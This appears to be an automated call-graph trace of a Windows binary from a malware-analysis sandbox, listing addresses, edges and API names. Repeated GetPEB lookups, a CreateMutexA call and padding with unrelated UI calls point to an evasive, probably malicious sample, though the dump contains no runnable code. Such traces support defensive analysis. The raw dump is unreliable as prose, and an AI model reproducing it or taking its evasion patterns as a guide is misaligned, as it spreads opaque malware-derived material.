7f3b7bb0 62643->62941 62646 7f37b900 std::ios_base::clear 30 API calls 62647 7f3846aa 62646->62647 62648 7f37b900 std::ios_base::clear 30 API calls 62647->62648 62649 7f3846b9 62648->62649 62649->61990 62651 7f394bbe 62650->62651 62947 7f37cc00 62651->62947 62655 7f3464e6 62654->62655 62657 7f3464eb 62654->62657 62959 7f37bc20 32 API calls 62655->62959 62658 7f335370 std::ios_base::clear 32 API calls 62657->62658 62659 7f346582 62658->62659 62659->62067 62661 7f3926c6 62660->62661 62960 7f3477a0 62661->62960 62663 7f3926ea 62963 7f3478f0 62663->62963 62665 7f392735 _Ptr_base 62666 7f39277a 62665->62666 62667 7f39275c 62665->62667 62970 7f392820 51 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62666->62970 62969 7f392820 51 API calls Concurrency::cancellation_token_source::~cancellation_token_source 62667->62969 62670 7f392778 std::ios_base::clear 62671 7f37b900 std::ios_base::clear 30 API calls 62670->62671 62672 7f3927d5 _Ptr_base 62671->62672 62673 7f37b900 std::ios_base::clear 30 API calls 62672->62673 62674 7f392801 62673->62674 62674->62106 62676 7f3348fc std::ios_base::clear 62675->62676 62678 7f334941 62676->62678 62998 7f37bc00 32 API calls std::ios_base::clear 62676->62998 62994 7f346df0 62678->62994 62680 7f3349bb 62681 7f349e20 62680->62681 62682 7f349e3c 62681->62682 62684 7f349e37 std::ios_base::clear 62681->62684 62683 7f37b900 std::ios_base::clear 30 API calls 62682->62683 62683->62684 62684->62116 62686 7f3b4582 62685->62686 63000 7f3470d0 62686->63000 62692 7f3b45d3 63019 7f350590 62692->63019 62694 7f3b45fd 63023 7f34b4e0 62694->63023 62696 7f3b4627 63027 7f34f1e0 62696->63027 62698 7f3b4651 62699 7f3b4662 GetPEB 62698->62699 62700 7f3b46c9 62699->62700 63031 7f350130 62700->63031 62702 7f3b48ff 62703 7f3b4910 GetPEB 62702->62703 62704 7f3b4977 62703->62704 62705 7f3470d0 63 API calls 62704->62705 62706 7f3b4bad 62705->62706 63035 7f34cf10 62706->63035 62708 7f3b4bbe 63039 7f333dc0 62708->63039 62713 7f333dc0 32 API calls 62714 7f3b4c06 62713->62714 62715 7f333dc0 32 API calls 62714->62715 62716 7f3b4c0f 62715->62716 63051 7f34dc70 62716->63051 62718 7f3b4c1f 62719 7f333dc0 32 API calls 62718->62719 62720 7f3b4c4a 62719->62720 62721 7f333dc0 32 API calls 62720->62721 62722 7f3b4c53 62721->62722 63055 7f34cac0 62722->63055 62724 7f3b4c63 62725 7f333dc0 32 API calls 62724->62725 62726 7f3b4c92 62725->62726 62727 7f333d40 32 API calls 62726->62727 62728 7f3b4c9b 62727->62728 62729 7f333dc0 32 API calls 62728->62729 62730 7f3b4ca4 62729->62730 63059 7f34c320 62730->63059 62732 7f3b4cb9 63063 7f34f2d0 62732->63063 62734 7f3b4cdb 62735 7f333dc0 32 API calls 62734->62735 62736 7f3b4d0d 62735->62736 62737 7f349f90 61 API calls 62736->62737 62738 7f3b4d17 62737->62738 62739 7f333dc0 32 API calls 62738->62739 62740 7f3b4d1d 62739->62740 63067 7f350670 62740->63067 62742 7f3b4d32 63071 7f350730 62742->63071 62744 7f3b4d4b 62745 7f333dc0 32 API calls 62744->62745 62746 7f3b4d76 62745->62746 62747 7f333dc0 32 API calls 62746->62747 62748 7f3b4d7f 62747->62748 63075 7f351c60 62748->63075 62919 7f37cab4 std::ios_base::clear 62918->62919 62920 7f37caf0 62918->62920 62919->61982 63242 7f339990 32 API calls 4 library calls 62920->63242 62934->62626 62935->62630 62936->62635 62938 7f3b27b3 62937->62938 62939 7f37b900 std::ios_base::clear 30 API calls 62938->62939 62940 7f384671 62939->62940 62940->62642 62946 7f3b7bfb 62941->62946 62942 7f3467d0 std::ios_base::clear 32 API calls 62943 7f3b7d1e 62942->62943 62944 7f37b900 std::ios_base::clear 30 API calls 62943->62944 62945 7f384692 62944->62945 62945->62646 62946->62942 62950 7f37bc30 62947->62950 62952 7f37bc4d 62950->62952 62951 7f37bcac GetPEB 62953 7f37bd23 GetPEB 62951->62953 62952->62951 62955 7f37c019 62953->62955 62958 7f3ae380 GetPEB 62955->62958 62957 7f37c1d5 62957->61993 62958->62957 62959->62657 62971 7f3420f0 62960->62971 62962 7f3477bd _Ptr_base 62962->62663 62964 7f347977 _memcpy_s 62963->62964 62974 7f3df09c 62964->62974 62966 7f34797f _memcpy_s 62978 7f346740 62966->62978 62968 7f347a15 _Ptr_base 62968->62665 62969->62670 62970->62670 62972 7f3d0c5b std::_Facet_Register 16 API calls 62971->62972 62973 7f342104 _Ptr_base 62972->62973 62973->62962 62975 7f3df0a7 62974->62975 62981 7f3e4209 62975->62981 62986 7f3355a0 62978->62986 62980 7f3467ac 62980->62968 62982 7f3e421c 62981->62982 62983 7f3df0b7 62981->62983 62982->62983 62985 7f3e9321 11 API calls 3 library calls 62982->62985 62983->62966 62985->62983 62987 7f3355b7 std::ios_base::clear 62986->62987 62989 7f3355c1 std::ios_base::clear 62987->62989 62992 7f37bc00 32 API calls std::ios_base::clear 62987->62992 62991 7f3355da _memcpy_s 62989->62991 62993 7f334a00 32 API calls 2 library calls 62989->62993 62991->62980 62992->62989 62993->62991 62995 7f346f19 _memcpy_s 62994->62995 62996 7f346e86 std::ios_base::clear 62994->62996 62995->62680 62999 7f334a00 32 API calls 2 library calls 62996->62999 62998->62678 62999->62995 63001 7f3470fb 63000->63001 63111 7f345b50 63001->63111 63006 7f349f90 63208 7f348aa0 63006->63208 63008 7f34a027 std::ios_base::_Ios_base_dtor 63011 7f383af0 std::ios_base::clear 32 API calls 63008->63011 63012 7f34a172 63011->63012 63212 7f349c00 63012->63212 63015 7f351720 63017 7f3517dd 63015->63017 63018 7f351758 swprintf 63015->63018 63017->62692 63219 7f3d0fac 33 API calls 63018->63219 63020 7f35065d 63019->63020 63022 7f3505d8 swprintf 63019->63022 63020->62694 63220 7f3d0fac 33 API calls 63022->63220 63024 7f34b5a1 63023->63024 63026 7f34b51c swprintf 63023->63026 63024->62696 63221 7f3d0fac 33 API calls 63026->63221 63029 7f34f2b9 63027->63029 63030 7f34f234 swprintf 63027->63030 63029->62698 63222 7f3d0fac 33 API calls 63030->63222 63032 7f350221 63031->63032 63033 7f35019c swprintf 63031->63033 63032->62702 63223 7f3d0fac 33 API calls 63033->63223 63036 7f34cfc1 63035->63036 63038 7f34cf3c swprintf 63035->63038 63036->62708 63224 7f3d0fac 33 API calls 63038->63224 63040 7f333dfe 63039->63040 63041 7f348aa0 32 API calls 63040->63041 63046 7f333f0f 63041->63046 63042 7f383af0 std::ios_base::clear 32 API calls 63043 7f33422f 63042->63043 63044 7f349c00 32 API calls 63043->63044 63045 7f33424a 63044->63045 63047 7f333d40 63045->63047 63046->63042 63048 7f333d64 63047->63048 63225 7f339230 63048->63225 63053 7f34dd21 63051->63053 63054 7f34dc9c swprintf 63051->63054 63053->62718 63233 7f3d0fac 33 API calls 63054->63233 63056 7f34cb71 63055->63056 63058 7f34caec swprintf 63055->63058 63056->62724 63234 7f3d0fac 33 API calls 63058->63234 63060 7f34c3d1 63059->63060 63062 7f34c34c swprintf 63059->63062 63060->62732 63235 7f3d0fac 33 API calls 63062->63235 63064 7f34f3b9 63063->63064 63066 7f34f334 swprintf 63063->63066 63064->62734 63236 7f3d0fac 33 API calls 63066->63236 63068 7f350721 63067->63068 63070 7f35069c swprintf 63067->63070 63068->62742 63237 7f3d0fac 33 API calls 63070->63237 63072 7f350895 63071->63072 63074 7f350810 swprintf 63071->63074 63072->62744 63238 7f3d0fac 33 API calls 63074->63238 63112 7f345b7b 63111->63112 63120 7f345c50 63112->63120 63117 7f347040 63202 7f346220 63117->63202 63119 7f347051 63119->63006 63121 7f345c7b 63120->63121 63128 7f3af970 63121->63128 63124 7f346130 63125 7f34615b 63124->63125 63127 7f345bfb 63125->63127 63201 7f3d072d 9 API calls 2 library calls 63125->63201 63127->63117 63137 7f379c20 63128->63137 63132 7f3af9e3 63133 7f345be3 63132->63133 63156 7f3d072d 9 API calls 2 library calls 63132->63156 63133->63124 63134 7f3af99e 63134->63132 63148 7f383af0 63134->63148 63138 7f383af0 std::ios_base::clear 32 API calls 63137->63138 63139 7f379ca2 63138->63139 63140 7f3d0c5b std::_Facet_Register 16 API calls 63139->63140 63141 7f379ca9 63140->63141 63142 7f379cc3 63141->63142 63157 7f3d0224 28 API calls 5 library calls 63141->63157 63144 7f3bc3a0 63142->63144 63145 7f3bc3dd 63144->63145 63158 7f3456b0 63145->63158 63147 7f3bc3f9 std::ios_base::_Ios_base_dtor 63147->63134 63149 7f383b19 63148->63149 63150 7f383b7c 63148->63150 63152 7f383b2a std::ios_base::clear 63149->63152 63198 7f3d1f75 RaiseException 63149->63198 63150->63132 63199 7f3483f0 32 API calls std::ios_base::clear 63152->63199 63154 7f383b6e 63200 7f3d1f75 RaiseException 63154->63200 63156->63133 63157->63142 63172 7f3cfe0c 63158->63172 63162 7f3456f5 63163 7f345717 63162->63163 63191 7f3793b0 61 API calls 2 library calls 63162->63191 63184 7f3cfe64 63163->63184 63165 7f3457d0 63165->63147 63167 7f34572f 63168 7f345737 63167->63168 63169 7f34573e 63167->63169 63192 7f37b2a0 RaiseException Concurrency::cancel_current_task 63168->63192 63193 7f3d01f2 16 API calls std::_Facet_Register 63169->63193 63173 7f3cfe1b 63172->63173 63174 7f3cfe22 63172->63174 63194 7f3df93f 6 API calls 2 library calls 63173->63194 63176 7f3456dc 63174->63176 63195 7f3d0890 EnterCriticalSection 63174->63195 63178 7f34aa20 63176->63178 63179 7f34aa65 63178->63179 63180 7f34aa31 63178->63180 63179->63162 63181 7f3cfe0c std::_Lockit::_Lockit 7 API calls 63180->63181 63182 7f34aa3b 63181->63182 63183 7f3cfe64 std::_Lockit::~_Lockit 2 API calls 63182->63183 63183->63179 63185 7f3df94d 63184->63185 63188 7f3cfe6e 63184->63188 63197 7f3df928 LeaveCriticalSection 63185->63197 63187 7f3cfe81 63187->63165 63188->63187 63196 7f3d089e LeaveCriticalSection 63188->63196 63190 7f3df954 63190->63165 63191->63167 63192->63163 63193->63163 63194->63176 63195->63176 63196->63187 63197->63190 63198->63152 63199->63154 63200->63150 63201->63127 63203 7f3d0c5b std::_Facet_Register 16 API calls 63202->63203 63204 7f3462c6 63203->63204 63206 7f3462e0 63204->63206 63207 7f3d0224 28 API calls 5 library calls 63204->63207 63206->63119 63207->63206 63209 7f348aeb 63208->63209 63211 7f348b3a 63209->63211 63217 7f3971d0 32 API calls std::ios_base::clear 63209->63217 63211->63008 63216 7f3457f0 61 API calls 5 library calls 63211->63216 63213 7f349c23 63212->63213 63215 7f349c4c 63213->63215 63218 7f37aef0 32 API calls std::ios_base::clear 63213->63218 63215->63015 63216->63008 63217->63211 63218->63215 63219->63017 63220->63020 63221->63024 63222->63029 63223->63032 63224->63036 63226 7f339288 63225->63226 63227 7f348aa0 32 API calls 63226->63227 63230 7f339308 63227->63230 63228 7f383af0 std::ios_base::clear 32 API calls 63229 7f3395eb 63228->63229 63231 7f349c00 32 API calls 63229->63231 63230->63228 63232 7f333dad 63231->63232 63232->62713 63233->63053 63234->63056 63235->63060 63236->63064 63237->63068 63238->63072 63242->62919 63245 7f33d0f3 63243->63245 63244 7f33d196 63259 7f349e80 63244->63259 63245->63244 63246 7f3467d0 std::ios_base::clear 32 API calls 63245->63246 63247 7f33d126 63246->63247 63263 7f334860 32 API calls std::ios_base::clear 63247->63263 63251 7f33d148 63264 7f3844c0 32 API calls std::ios_base::clear 63251->63264 63253 7f33d16a 63265 7f3d1f75 RaiseException 63253->63265 63255 7f33d17b 63256 7f37b900 std::ios_base::clear 30 API calls 63255->63256 63257 7f33d187 63256->63257 63258 7f37b900 std::ios_base::clear 30 API calls 63257->63258 63258->63244 63260 7f33d1e6 63259->63260 63261 7f349e9c 63259->63261 63260->62309 63262 7f37caa0 32 API calls 63261->63262 63262->63260 63263->63251 63264->63253 63265->63255 63266->62313 63267->62315 63268->62319 63269->62328 63270->62350 63271->62342 63272->62342 63273->62350 63274->62350 63275->62350 63276->62350 63277->62350 63278->62337 63279->62347 63280->62347 63281->62347 61255 7f35bae5 61256 7f35baec CreateMutexA 61255->61256 61258 7f35bb00 swprintf 61256->61258 61257 7f35bb15 GetProcessHeap 61257->61258 61258->61257 61271 7f35c5d9 swprintf 61258->61271 61259 7f3608fe IsWow64Message 61260 7f360957 SetLastError 61259->61260 61267 7f360949 swprintf 61259->61267 61260->61267 61261 7f361aa3 61310 7f397510 lstrlenW GetCaretBlinkTime swprintf 61261->61310 61263 7f361ab9 61274 7f362023 swprintf 61263->61274 61288 7f3607be swprintf 61263->61288 61311 7f397510 lstrlenW GetCaretBlinkTime swprintf 61263->61311 61264 7f3627f0 GetModuleHandleA 61275 7f36281e swprintf 61264->61275 61266 7f360c35 IsValidCodePage 61266->61267 61267->61259 61267->61260 61267->61261 61267->61266 61269 7f3638a9 GetLastError 61279 7f3638ba swprintf 61269->61279 61269->61288 61270 7f361e12 swprintf 61270->61274 61271->61259 61273 7f35eed7 GetFocus 61271->61273 61281 7f35eb38 lstrlenW 61271->61281 61272 7f362f89 lstrlenA 61272->61275 61276 7f35ef14 61273->61276 61277 7f35eeec GetMenu GetSubMenu 61273->61277 61274->61264 61275->61272 61278 7f3632ff IsValidCodePage 61275->61278 61280 7f36348f swprintf 61275->61280 61312 7f39afc0 GetSystemDefaultLangID GetFocus GetMenu EndMenu swprintf 61275->61312 61276->61259 61284 7f35ef4a swprintf 61276->61284 61277->61276 61278->61275 61282 7f363f21 lstrlenA 61279->61282 61283 7f3640ff lstrlenW 61279->61283 61294 7f36425f swprintf 61279->61294 61280->61269 61281->61271 61281->61273 61282->61279 61283->61282 61293 7f35f463 swprintf 61284->61293 61309 7f39cc60 GetCaretBlinkTime swprintf 61284->61309 61286 7f360303 GetModuleHandleA 61291 7f360322 swprintf 61286->61291 61287 7f3649e7 IsValidCodePage 61287->61294 61289 7f360518 GetOEMCP 61308 7f36052b swprintf 61289->61308 61290 7f365278 IsValidCodePage 61300 7f36529e swprintf 61290->61300 61291->61288 61291->61289 61291->61308 61293->61286 61293->61288 61294->61287 61294->61290 61296 7f365aec GetFocus 61297 7f365b01 GetSystemMenu 61296->61297 61296->61300 61297->61300 61298 7f365be1 61299 7f365d67 IsValidCodePage 61298->61299 61301 7f365dc1 swprintf 61299->61301 61300->61288 61300->61296 61300->61298 61313 7f39afc0 GetSystemDefaultLangID GetFocus GetMenu EndMenu swprintf 61300->61313 61314 7f39f190 IsValidCodePage GetOEMCP swprintf 61301->61314 61303 7f367675 CloseHandle 61307 7f367682 swprintf 61303->61307 61304 7f3676b8 GetFocus 61305 7f3676cd IsWindow ArrangeIconicWindows 61304->61305 61304->61307 61305->61307 61306 7f36622e swprintf 61306->61288 61306->61303 61307->61304 61307->61308 61308->61288 61309->61293 61310->61263 61311->61270 61312->61275 61313->61300 61314->61306 63285 7f36a8e8 63286 7f36a908 swprintf 63285->63286 63321 7f3b28c0 63286->63321 63293 7f3463a0 std::ios_base::clear 32 API calls 63294 7f36abef 63293->63294 63295 7f3463a0 std::ios_base::clear 32 API calls 63294->63295 63296 7f36ac21 63295->63296 63297 7f3463a0 std::ios_base::clear 32 API calls 63296->63297 63298 7f36ac42 63297->63298 63299 7f3463a0 std::ios_base::clear 32 API calls 63298->63299 63300 7f36ac63 63299->63300 63301 7f3ac670 53 API calls 63300->63301 63302 7f36ac79 63301->63302 63303 7f3463a0 std::ios_base::clear 32 API calls 63302->63303 63304 7f36ac9a 63303->63304 63305 7f3463a0 std::ios_base::clear 32 API calls 63304->63305 63306 7f36acbb 63305->63306 63400 7f396330 63306->63400 63308 7f36b581 GetActiveWindow 63313 7f36accb swprintf 63308->63313 63310 7f36c59d GetCursorPos 63316 7f36c5b0 swprintf 63310->63316 63311 7f36c3b3 GetCursor 63311->63310 63311->63316 63312 7f36cd21 lstrlenW 63314 7f36cd52 swprintf 63312->63314 63313->63308 63313->63311 63620 7f39afc0 GetSystemDefaultLangID GetFocus GetMenu EndMenu swprintf 63313->63620 63621 7f397510 lstrlenW GetCaretBlinkTime swprintf 63314->63621 63316->63312 63316->63314 63318 7f36dc1e swprintf 63319 7f36e39f SetLastError 63318->63319 63320 7f36e3b2 swprintf 63319->63320 63322 7f3b28f5 63321->63322 63323 7f335370 std::ios_base::clear 32 API calls 63322->63323 63324 7f3b2947 63323->63324 63622 7f347700 63324->63622 63326 7f3b297f 63625 7f34fdb0 63326->63625 63328 7f3b29a5 63329 7f335370 std::ios_base::clear 32 API calls 63328->63329 63330 7f3b2a24 63329->63330 63330->63330 63331 7f335370 std::ios_base::clear 32 API calls 63330->63331 63332 7f3b2a8e 63331->63332 63332->63332 63333 7f335370 std::ios_base::clear 32 API calls 63332->63333 63334 7f3b2b03 63333->63334 63334->63334 63335 7f335370 std::ios_base::clear 32 API calls 63334->63335 63336 7f3b2b7d 63335->63336 63337 7f347680 32 API calls 63336->63337 63338 7f3b2b9d 63337->63338 63339 7f347680 32 API calls 63338->63339 63340 7f3b2bb8 63339->63340 63341 7f3463a0 std::ios_base::clear 32 API calls 63340->63341 63342 7f3b2be0 63341->63342 63343 7f3463a0 std::ios_base::clear 32 API calls 63342->63343 63344 7f3b2c01 63343->63344 63345 7f3463a0 std::ios_base::clear 32 API calls 63344->63345 63346 7f3b2c22 63345->63346 63347 7f3463a0 std::ios_base::clear 32 API calls 63346->63347 63348 7f3b2c43 63347->63348 63629 7f347e60 63348->63629 63352 7f3b2c6d 63353 7f37b900 std::ios_base::clear 30 API calls 63352->63353 63354 7f3b2c7c 63353->63354 63355 7f37b900 std::ios_base::clear 30 API calls 63354->63355 63356 7f3b2c8b 63355->63356 63357 7f37b900 std::ios_base::clear 30 API calls 63356->63357 63358 7f3b2c9a 63357->63358 63359 7f37b900 std::ios_base::clear 30 API calls 63358->63359 63360 7f3b2ca9 63359->63360 63361 7f37b540 30 API calls 63360->63361 63362 7f36a9ff 63361->63362 63363 7f347680 63362->63363 63748 7f335a30 63363->63748 63366 7f348480 63367 7f3484b8 63366->63367 63766 7f378110 63367->63766 63370 7f347680 32 API calls 63371 7f34861e 63370->63371 63769 7f3ae570 63371->63769 63385 7f34865a 63875 7f3ab130 63385->63875 63389 7f34866a 63891 7f3ae860 GetPEB 63389->63891 63396 7f37b540 30 API calls 63397 7f34868e 63396->63397 63398 7f37b540 30 API calls 63397->63398 63399 7f34869d 63398->63399 63399->63293 64072 7f352f60 63400->64072 63402 7f396373 64076 7f37ceb0 63402->64076 63408 7f396533 63410 7f37b900 std::ios_base::clear 30 API calls 63408->63410 63412 7f396547 63410->63412 63413 7f37b900 std::ios_base::clear 30 API calls 63412->63413 63414 7f396552 63413->63414 63416 7f37b900 std::ios_base::clear 30 API calls 63414->63416 63415 7f396428 63415->63408 63417 7f3463a0 std::ios_base::clear 32 API calls 63415->63417 63418 7f396561 63416->63418 63419 7f396450 63417->63419 63420 7f37b900 std::ios_base::clear 30 API calls 63418->63420 64103 7f34acc0 53 API calls 3 library calls 63419->64103 63422 7f39656c 63420->63422 63424 7f3345e0 53 API calls 63422->63424 63423 7f396462 63425 7f33d200 32 API calls 63423->63425 63429 7f39658d 63424->63429 63426 7f39648b 63425->63426 63427 7f384610 32 API calls 63426->63427 63428 7f3964aa std::ios_base::clear 63427->63428 63435 7f394b90 4 API calls 63428->63435 63430 7f3966ad 63429->63430 63431 7f3463a0 std::ios_base::clear 32 API calls 63429->63431 63432 7f392690 53 API calls 63430->63432 63434 7f3965b1 63431->63434 63433 7f3966c9 std::ios_base::clear 63432->63433 63440 7f394b90 4 API calls 63433->63440 63436 7f3345e0 53 API calls 63434->63436 63437 7f3964dd 63435->63437 63438 7f3965de 63436->63438 63439 7f333170 53 API calls 63437->63439 64105 7f34a670 53 API calls 3 library calls 63438->64105 63442 7f3964fd 63439->63442 63450 7f3966fc 63440->63450 64104 7f34acc0 53 API calls 3 library calls 63442->64104 63443 7f3965e5 63446 7f33d200 32 API calls 63443->63446 63445 7f39650f 63447 7f349d60 53 API calls 63445->63447 63448 7f3965fd 63446->63448 63449 7f396524 63447->63449 63451 7f384610 32 API calls 63448->63451 63452 7f37b900 std::ios_base::clear 30 API calls 63449->63452 63450->63450 63454 7f335370 std::ios_base::clear 32 API calls 63450->63454 63453 7f39661c std::ios_base::clear 63451->63453 63452->63408 63456 7f394b90 4 API calls 63453->63456 63455 7f396777 63454->63455 63457 7f37b900 std::ios_base::clear 30 API calls 63455->63457 63458 7f39664f 63456->63458 63459 7f396786 63457->63459 63460 7f333170 53 API calls 63458->63460 63461 7f3348e0 32 API calls 63459->63461 63462 7f39666f 63460->63462 63463 7f3967a0 63461->63463 63464 7f3345e0 53 API calls 63462->63464 63465 7f349e20 30 API calls 63463->63465 63467 7f39668c 63464->63467 63466 7f3967bb 63465->63466 63468 7f37b900 std::ios_base::clear 30 API calls 63466->63468 64106 7f34a670 53 API calls 3 library calls 63467->64106 63470 7f3967c6 63468->63470 63472 7f3463a0 std::ios_base::clear 32 API calls 63470->63472 63471 7f396693 63473 7f349d60 53 API calls 63471->63473 63474 7f3967dd 63472->63474 63475 7f39669e 63473->63475 63476 7f3463a0 std::ios_base::clear 32 API calls 63474->63476 63477 7f37b900 std::ios_base::clear 30 API calls 63475->63477 63478 7f3967fb 63476->63478 63477->63430 63479 7f3463a0 std::ios_base::clear 32 API calls 63478->63479 63480 7f396819 63479->63480 63481 7f3b4560 86 API calls 63480->63481 63482 7f396829 63481->63482 63483 7f396895 63482->63483 64107 7f34c260 33 API calls swprintf 63482->64107 63484 7f3463a0 std::ios_base::clear 32 API calls 63483->63484 63486 7f3968ac 63484->63486 63487 7f3463a0 std::ios_base::clear 32 API calls 63486->63487 63490 7f3968ca 63487->63490 63488 7f396858 std::ios_base::clear 64108 7f341d00 GetPEB 63488->64108 63490->63490 63492 7f335370 std::ios_base::clear 32 API calls 63490->63492 63491 7f396888 63491->63483 63495 7f39710d 63491->63495 63493 7f396963 63492->63493 63494 7f3b4560 86 API calls 63493->63494 63496 7f396977 63494->63496 63497 7f3463a0 std::ios_base::clear 32 API calls 63495->63497 63498 7f3969e3 63496->63498 64109 7f351990 33 API calls swprintf 63496->64109 63499 7f397121 63497->63499 63502 7f3463a0 std::ios_base::clear 32 API calls 63498->63502 63501 7f3463a0 std::ios_base::clear 32 API calls 63499->63501 63504 7f397142 63501->63504 63503 7f3969fa 63502->63503 63506 7f3463a0 std::ios_base::clear 32 API calls 63503->63506 64118 7f385fa0 58 API calls 3 library calls 63504->64118 63514 7f396a18 63506->63514 63507 7f39714f 63509 7f37b900 std::ios_base::clear 30 API calls 63507->63509 63508 7f3969a6 std::ios_base::clear 64110 7f341d00 GetPEB 63508->64110 63510 7f397170 63509->63510 63511 7f37b900 std::ios_base::clear 30 API calls 63510->63511 63513 7f39717f 63511->63513 63516 7f37b900 std::ios_base::clear 30 API calls 63513->63516 63517 7f335370 std::ios_base::clear 32 API calls 63514->63517 63515 7f3969d6 63515->63498 63522 7f397044 63515->63522 63518 7f39718b 63516->63518 63519 7f396aa7 63517->63519 63520 7f37b900 std::ios_base::clear 30 API calls 63518->63520 63521 7f3b4560 86 API calls 63519->63521 63524 7f397197 63520->63524 63525 7f396abb 63521->63525 63523 7f3463a0 std::ios_base::clear 32 API calls 63522->63523 63526 7f397058 63523->63526 63527 7f37ca10 Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 63524->63527 63528 7f396b27 63525->63528 64111 7f34d450 33 API calls swprintf 63525->64111 63529 7f3463a0 std::ios_base::clear 32 API calls 63526->63529 63531 7f3971a3 63527->63531 63530 7f3463a0 std::ios_base::clear 32 API calls 63528->63530 63533 7f397079 63529->63533 63534 7f396b3e 63530->63534 63535 7f386350 Concurrency::cancellation_token_source::~cancellation_token_source 53 API calls 63531->63535 64117 7f385fa0 58 API calls 3 library calls 63533->64117 63537 7f3463a0 std::ios_base::clear 32 API calls 63534->63537 63538 7f3971b0 63535->63538 63547 7f396b5c 63537->63547 63540 7f37b900 std::ios_base::clear 30 API calls 63538->63540 63539 7f397086 63542 7f37b900 std::ios_base::clear 30 API calls 63539->63542 63543 7f396f64 63540->63543 63541 7f396aea std::ios_base::clear 64112 7f341d00 GetPEB 63541->64112 63544 7f3970a7 63542->63544 63543->63313 63546 7f37b900 std::ios_base::clear 30 API calls 63544->63546 63549 7f3970b6 63546->63549 63547->63547 63551 7f335370 std::ios_base::clear 32 API calls 63547->63551 63548 7f396b1a 63548->63528 63556 7f396f6c 63548->63556 63550 7f37b900 std::ios_base::clear 30 API calls 63549->63550 63552 7f3970c5 63550->63552 63553 7f396bfe 63551->63553 63554 7f37b900 std::ios_base::clear 30 API calls 63552->63554 63555 7f3b4560 86 API calls 63553->63555 63557 7f3970d1 63554->63557 63558 7f396c12 63555->63558 63559 7f3463a0 std::ios_base::clear 32 API calls 63556->63559 63560 7f37b900 std::ios_base::clear 30 API calls 63557->63560 63561 7f396c87 GetPEB 63558->63561 64113 7f34eb70 33 API calls swprintf 63558->64113 63562 7f396f80 63559->63562 63563 7f3970dd 63560->63563 63578 7f396cd1 63561->63578 63565 7f3463a0 std::ios_base::clear 32 API calls 63562->63565 63566 7f37ca10 Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 63563->63566 63567 7f396fa1 63565->63567 63569 7f3970e9 63566->63569 64116 7f385fa0 58 API calls 3 library calls 63567->64116 63571 7f386350 Concurrency::cancellation_token_source::~cancellation_token_source 53 API calls 63569->63571 63570 7f396fae 63572 7f37b900 std::ios_base::clear 30 API calls 63570->63572 63573 7f3970f6 63571->63573 63575 7f396fcf 63572->63575 63576 7f37b900 std::ios_base::clear 30 API calls 63573->63576 63574 7f396c41 std::ios_base::clear 64114 7f341d00 GetPEB 63574->64114 63577 7f37b900 std::ios_base::clear 30 API calls 63575->63577 63576->63543 63580 7f396fde 63577->63580 63582 7f3463a0 std::ios_base::clear 32 API calls 63578->63582 63583 7f37b900 std::ios_base::clear 30 API calls 63580->63583 63581 7f396c7a 63581->63561 63581->63578 63584 7f396e99 63582->63584 63585 7f396fed 63583->63585 63586 7f3463a0 std::ios_base::clear 32 API calls 63584->63586 63587 7f37b900 std::ios_base::clear 30 API calls 63585->63587 63588 7f396eba 63586->63588 63589 7f396ffc 63587->63589 64115 7f385fa0 58 API calls 3 library calls 63588->64115 63591 7f37b900 std::ios_base::clear 30 API calls 63589->63591 63593 7f397008 63591->63593 63592 7f396ec7 63594 7f37b900 std::ios_base::clear 30 API calls 63592->63594 63595 7f37b900 std::ios_base::clear 30 API calls 63593->63595 63596 7f396ee8 63594->63596 63597 7f397014 63595->63597 63598 7f37b900 std::ios_base::clear 30 API calls 63596->63598 63599 7f37ca10 Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 63597->63599 63600 7f396ef7 63598->63600 63601 7f397020 63599->63601 63603 7f37b900 std::ios_base::clear 30 API calls 63600->63603 63602 7f386350 Concurrency::cancellation_token_source::~cancellation_token_source 53 API calls 63601->63602 63604 7f39702d 63602->63604 63605 7f396f06 63603->63605 63606 7f37b900 std::ios_base::clear 30 API calls 63604->63606 63607 7f37b900 std::ios_base::clear 30 API calls 63605->63607 63606->63543 63608 7f396f15 63607->63608 63609 7f37b900 std::ios_base::clear 30 API calls 63608->63609 63610 7f396f24 63609->63610 63611 7f37b900 std::ios_base::clear 30 API calls 63610->63611 63612 7f396f30 63611->63612 63613 7f37b900 std::ios_base::clear 30 API calls 63612->63613 63614 7f396f3c 63613->63614 63615 7f37ca10 Concurrency::cancellation_token_source::~cancellation_token_source 51 API calls 63614->63615 63616 7f396f48 63615->63616 63617 7f386350 Concurrency::cancellation_token_source::~cancellation_token_source 53 API calls 63616->63617 63618 7f396f55 63617->63618 63619 7f37b900 std::ios_base::clear 30 API calls 63618->63619 63619->63543 63620->63313 63621->63318 63671 7f335990 63622->63671 63626 7f34fe71 63625->63626 63628 7f34fdec swprintf 63625->63628 63626->63328 63715 7f3d0fac 33 API calls 63628->63715 63630 7f347e9b 63629->63630 63716 7f34b5b0 63630->63716 63632 7f347ef8 63720 7f34cc40 63632->63720 63634 7f347f19 63635 7f335370 std::ios_base::clear 32 API calls 63634->63635 63636 7f347f96 63635->63636 63636->63636 63637 7f335370 std::ios_base::clear 32 API calls 63636->63637 63638 7f34800f 63637->63638 63639 7f335370 std::ios_base::clear 32 API calls 63638->63639 63640 7f3480af 63639->63640 63641 7f347700 32 API calls 63640->63641 63642 7f3480e7 63641->63642 63643 7f349e80 32 API calls 63642->63643 63644 7f348112 63643->63644 63645 7f349e80 32 API calls 63644->63645 63646 7f34811e 63645->63646 63647 7f349e80 32 API calls 63646->63647 63648 7f34812d 63647->63648 63649 7f349e80 32 API calls 63648->63649 63653 7f34813c Concurrency::cancellation_token_source::~cancellation_token_source 63649->63653 63650 7f34823c 63651 7f37b900 std::ios_base::clear 30 API calls 63650->63651 63654 7f348248 63651->63654 63652 7f3463a0 std::ios_base::clear 32 API calls 63652->63653 63653->63650 63653->63652 63658 7f37b900 std::ios_base::clear 30 API calls 63653->63658 63724 7f336020 63653->63724 63656 7f37b900 std::ios_base::clear 30 API calls 63654->63656 63657 7f348254 63656->63657 63659 7f37b900 std::ios_base::clear 30 API calls 63657->63659 63658->63653 63660 7f348260 63659->63660 63661 7f37b900 std::ios_base::clear 30 API calls 63660->63661 63662 7f34826c 63661->63662 63663 7f37b540 30 API calls 63662->63663 63664 7f34827b 63663->63664 63665 7f37b540 63664->63665 63670 7f37b58e 63665->63670 63666 7f37b5b4 63669 7f37b5ea std::ios_base::_Ios_base_dtor 63666->63669 63747 7f378060 30 API calls Concurrency::cancellation_token_source::~cancellation_token_source 63666->63747 63669->63352 63670->63666 